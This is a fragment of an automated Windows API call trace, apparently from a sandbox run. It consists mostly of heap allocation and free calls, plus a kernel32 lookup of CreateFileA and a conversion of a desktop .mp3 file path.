hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0030.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0030.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0030.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.450] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0030.450] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.450] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0030.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0030.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.450] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0030.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0030.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0030.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0030.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0030.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0030.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0030.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0030.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0030.451] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0030.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0030.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0030.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0030.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.453] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.455] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0030.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cc10 [0030.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cc10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0030.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.456] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0030.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc10 [0030.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cc10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0030.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.456] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0030.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0030.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0030.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x31) returned 0x7c2080 [0030.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3", cchWideChar=49, lpMultiByteStr=0x7c2080, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3", lpUsedDefaultChar=0x0) returned 49 [0030.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0030.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.457] HeapFree 